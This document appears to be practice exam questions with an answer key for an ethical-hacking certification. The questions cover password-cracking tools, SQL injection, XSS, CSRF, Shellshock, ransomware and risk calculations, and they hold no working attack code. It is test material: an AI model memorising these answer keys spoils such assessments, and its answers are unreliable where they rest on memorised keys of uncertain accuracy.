Day 1 76-114

Question 1

1.76 Which THREE of these are used for password cracking?

A. BTCrack
B. John the Ripper
C. KerbCrack
D. Nikto
E. Cain and Abel
F. Havij

Answer 1

Answer: B,C,E

Question 2

1.77 On a Windows machine, what is the RID/SID of the administrator account?

A. 100
B. 412
C. 500
D. 999

Answer 2

Answer: C

Question 3

1.78 Hacker Joe attacks a web page by entering unexpected data on the logon page. He then gains access to the database and displays the contents of the table that has usernames and passwords of other users. What is the problem here?

A. Insufficient security management
B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient input validation

Answer 3

Answer: D

Question 4

1.79 Which of these is a set of rules for people who handle electronic medical data?

A. FISMA
B. COBIT
C. HIPAA
D. ISO/IEC 27002

Answer 4

Answer: C

Question 5

1.80 You boot your computer up to find a pop-up message saying that illegal activity was detected, and your computer is now locked. The message also states that you must pay a fine to have your computer unlocked. You find that you cannot bypass this message and you are unable to use your computer at all. Which of these threats is this describing?

A. Riskware
B. Spyware
C. Adware
D. Ransomware

Answer 5

Answer: D

Question 6

1.81 While you are logged in to your bank using your web browser, you get an e-mail with a link to another website. You click the link and go to the second site where you see some funny videos. The next day, your bank sends you an e-mail saying your account has been accessed from China, and funds have been transferred there. Which of these web vulnerabilities was exploited to steal your funds?

A. Web form input validation
B. Clickjacking
C. Cross-Site Scripting
D. Cross Site Request Forgery

Answer 6

Answer: D

Question 7

1.82 The chance of a hard drive failure is once every four years. The cost to buy a new hard drive is $400. It will require 5 hours to restore the OS and software to the new hard disk. It will require another 5 hours to restore the user data from the last backup to the new hard disk. The recovery tech earns $10/hour. Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%).

What is the closest approximate cost of this replacement and recovery operation per year?

A. $100
B. $125
C. $500
D. $1500

Answer 7

Answer: B

Question 8

1.83 An attacker wants to target your company with malware, so he compromises a web site your employees frequently visit. He hopes your users’ machines will become infected with the malware. Which type of attack is this?

A. Spear Phishing attack
B. Watering Hole attack
C. Heartbleed attack
D. Shellshock attack

Answer 8

Answer: B

Question 9

1.84 What is the process called that can record, log, and resolve events that happen in your company?

A. Metrics
B. Incident management process
C. Internal procedure
D. Security policy

Answer 9

Answer: B

Question 10

1.85 While doing a pen-test, you send the boss’s secretary an e-mail, changing the source to look like it came from the boss. You ask her for some links to relevant websites. She sends you the links via e-mail. You change them to links containing malware and send them back, telling her the links didn’t work. She tries the links herself and her machine gets infected, giving you access to it. Which testing method was used?

A. Piggybacking
B. Social engineering
C. Tailgating
D. Eavesdropping

Answer 10

Answer: B

Question 11

1.86 Which of the following describes a LM Hash:I - The maximum password length is 14 characters.II - There are no distinctions between uppercase and lowercase.III - It’s a simple algorithm, so 10,000,000 hashes can be generated per second.

A. I
B. II
C. I and II
D. I, II, and III

Answer 11

Answer: D

Question 12

1.87 In which phase of incident-handling do you define processes/procedures/rules, and create and test back-up and response plans?

A. Preparation phase
B. Identification phase
C. Containment phase
D. Recovery phase

Answer 12

Answer: A

Question 13

1.88 Which technique provides ‘security through obscurity‘ by hiding secret messages within ordinary messages?

A. Encryption
B. RSA algorithm
C. Steganography
D. Public-Key cryptography

Answer 13

Answer: C

Question 14

1.89 While doing a pen-test, you find a hidden folder with the admin’s bank account username and password information. What should you do?

A. Do not report it and continue the penetration test
B. Report immediately to the administrator
C. Transfer money from the administrator’s account to another account
D. Do not transfer the money but steal the bitcoins

Answer 14

Answer: B

Question 15

1.90 Risks = threats x vulnerabilities x impact is referred to as the:

A. Risk equation
B. Threat assessment
C. Disaster recovery formula
D. BIA equation

Answer 15

Answer: A

Question 16

1.91 Which password cracking technique takes the longest time and most effort?

A. Dictionary attack
B. Shoulder surfing
C. Brute force
D. Rainbow tables

Answer 16

Answer: C

Question 17

1.92 You find out your web site has some flaws, so to fix them you prevent users from entering HTML as input into the web site.
Which type of web flaw were you trying to fix?

A. Cross-site scripting vulnerability
B. Web site defacement vulnerability
C. SQL-injection vulnerability
D. Cross-site Request Forgery vulnerability

Answer 17

Answer: A

Question 18

1.93 Which is a typical method for exploiting the ShellShock vulnerability?

A. SYN Flood
B. Manipulate format strings in text fields
C. Through web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable to a vulnerable web server
D. SSH

Answer 18

Answer: C

Bash is the name of a popular shell (command prompt) in may Unix-based systems. Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an attacker can tack-on malicious code to the environment variable, which will run once the variable is received.

Question 19

1.94 Hacker Joe stands outside the facility while talking on his phone. When an authorized employee walks by, swipes her badge, and enters the building, Joe grabs the door before it closes. What just happened?

A. Phishing
B. Whaling
C. Piggybacking
D. Masquerading

Answer 19

Answer: C

Question 20

1.95 Which of these is NOT one of the basic responses to risk?

A. Avoid
B. Delegate
C. Mitigate
D. Accept

Answer 20

Answer: B

Question 21

1.96 In 2014 a well-publicized vulnerability was found in the GNU Bash shell that would let an attacker run remote commands on a vulnerable system. What was this called?

A. Shellshock
B. Shellbash
C. Rootshock
D. Rootshell

Answer 21

Answer: A

Question 22

1.97 The CEO hired you to mitigate threats and vulnerabilities to the point that you have totally eliminated risk. What is one of the first things you should do?

A. Start the Wireshark application to start sniffing network traffic
B. Interview all employees in the company to rule out possible insider threats
C. Establish attribution to suspected attackers
D. Explain to the CEO that you cannot eliminate all risk, but you will be able to reduce risk to an acceptable level

Answer 22

Answer: D

Question 23

1.98 In Risk Management, how is the term “likelihood” related to the concept of “threat?”

A. Likelihood is a possible threat-source that may exploit a vulnerability
B. Likelihood is the probability that a vulnerability is a threat-source
C. Likelihood is a the probability that a threat-source will exploit a vulnerability
D. Likelihood is the likely source of a threat that could exploit a vulnerability

Answer 23

Answer: C

Question 24

1.99 The Open Web Application Security Project (OWASP) is a community-driven effort to improve the security of web applications. What is the top item on their Top Ten most critical web security risks?

A. Injection
B. Cross Site Request Forgery
C. Cross Site Scripting
D. Path disclosure

Answer 24

Answer: A

Check out OWASP’s top-10 list at https://www.owasp.org/index.php/Top10#OWASP_Top_10_for_2013
You’ll see that Injection is at the top of their list

Question 25

1.100 All of these are Bluetooth attacks except for which?

A. Bluejacking
B. Bluesnarfing
C. Bluedriving
D. Bluesmacking

Answer 25

Answer: C

Question 26

1.101 Which of these could best describe SQL injection?

A. It is a Denial of Service attack
B. It is an attack used to gain unauthorized access to a database
C. It is an attack used to modify code in an application
D. It is a Man-In-The-Middle attack between your SQL server and web-app server

Answer 26

Answer: B

Question 27

1.102 After finding and mitigating the vulnerabilities on your network, some small amount of risk still remains. What is this called?

A. Impact risk
B. Deferred risk
C. Residual risk
D. Inherent risk

Answer 27

Answer: C

Question 28

1.103 Which of these is an entity or event with the potential to harm a system through unauthorized access, theft, destruction, denial of service, or modification of data.

A. Risk
B. Threat
C. Attack
D. Vulnerability

Answer 28

Answer: B

Question 29

1.104 Which of these is the most “low-tech” method of accessing a system?

A. Scanning
B. Eavesdropping
C. Sniffing
D. Social engineering

Answer 29

Answer: D

Question 30

1.105 If you boot a Windows machine with an Ubuntu Live CD, which Linux command-line tool can change user passwords and activate disabled accounts in the SAM file of the Windows machine?

A. SET
B. CHNTPW
C. Cain & Abel
D. John the Ripper

Answer 30

Answer: B

Question 31

1.106 Where should you store your backup tapes?
A. In a dry, cool environment
B. In a climate controlled facility off-site
C. Inside the data center for faster retrieval in a fireproof safe
D. On a different floor in the same building

Answer 31

Answer: B

Question 32

1.107 Which one of these would be the biggest threat involving backups?

A. An un-encrypted backup can be misplaced or stolen
B. A backup is unavailable during disaster recovery
C. A backup is the source of malware or illicit information
D. A backup is incomplete because no verification was performed

Answer 32

Answer: A

Question 33

1.108 An attacker infected your web server with a trojan. He can now use your server send spam mail, and can also use it to join in coordinated attacks against targets he chooses. Which type of trojan would this be?

A. Turtle trojans
B. Botnet trojan
C. Banking trojan
D. Ransomware trojan

Answer 33

Answer: B

Question 34

1.109 Which of these would be the best way to prevent XSS (Cross-Site Scripting) in your application?

A. Validate and escape all information sent to a server
B. Verify access right before allowing access to protected information and UI controls
C. Use security policies and procedures to define and implement proper security settings
D. Use digital certificates to authenticate a server prior to sending data

Answer 34

Answer: A

Escaping the data is cleaning it up before presenting it to other users. Sometimes this is called ‘output validation’.

Question 35

1.110 Your website sells widgets to internet customers and your security team regularly verifies that the components of the website are safe. Later you add 3rd party Java analytics tools to the site to track customer activities on your website. These tools are located on the servers of the analytics company. What’s the main risk here?

A. There is no risk at all as the analytics services are trustworthy.
B. External scripts increase the outbound company data traffic which leads to greater financial loss.
C. External scripts have direct access to the company servers and can steal the data from there.
D. External scripts contents could be maliciously modified without the security team’s knowledge.

Answer 35

Answer: D

Question 36

1.111 One of your largest customers has placed a call into your IT department. The customer is asking about your network systems, infrastructure, and team. The customer has stated that they are considering possible integration options between your two companies. How should your IT employee respond to this request for information?

A. Since the company’s policy is all about customer service, he should provide the information.
B. The employee should not provide any information without previous management authorization.
C. The employee should just hang up.
D. The employee can not provide any information, but he should provide the name of the person in charge.

Answer 36

Answer: B

Even providing the name of the person in charge could be damaging, especially if the caller is not who he claims to be.

Question 37

1.112 What’s the name of the process where you determine the critical business processes, and the potential impacts when you lose their services?

A. Risk mitigation
B. Emergency Plan Response (EPR)
C. Disaster Revovery Planning (DRP)
D. Business Impact Analysis (BIA)

Answer 37

Answer: D

Question 38

1.113 What’s the correct term for the amount of risk left over after making all reasonable attempts at mitigating the risk by deploying countermeasures.

A. Inherent risk
B. Residual risk
C. Impact risk
D. Deferred risk

Answer 38

Answer: B

Question 39

1.114 What is the name of a type of virus that tries to install itself inside the file it’s infecting?

A. Polymorphic virus
B. Tunneling virus
C. Cavity virus
D. Stealth virus

Answer 39

Answer: C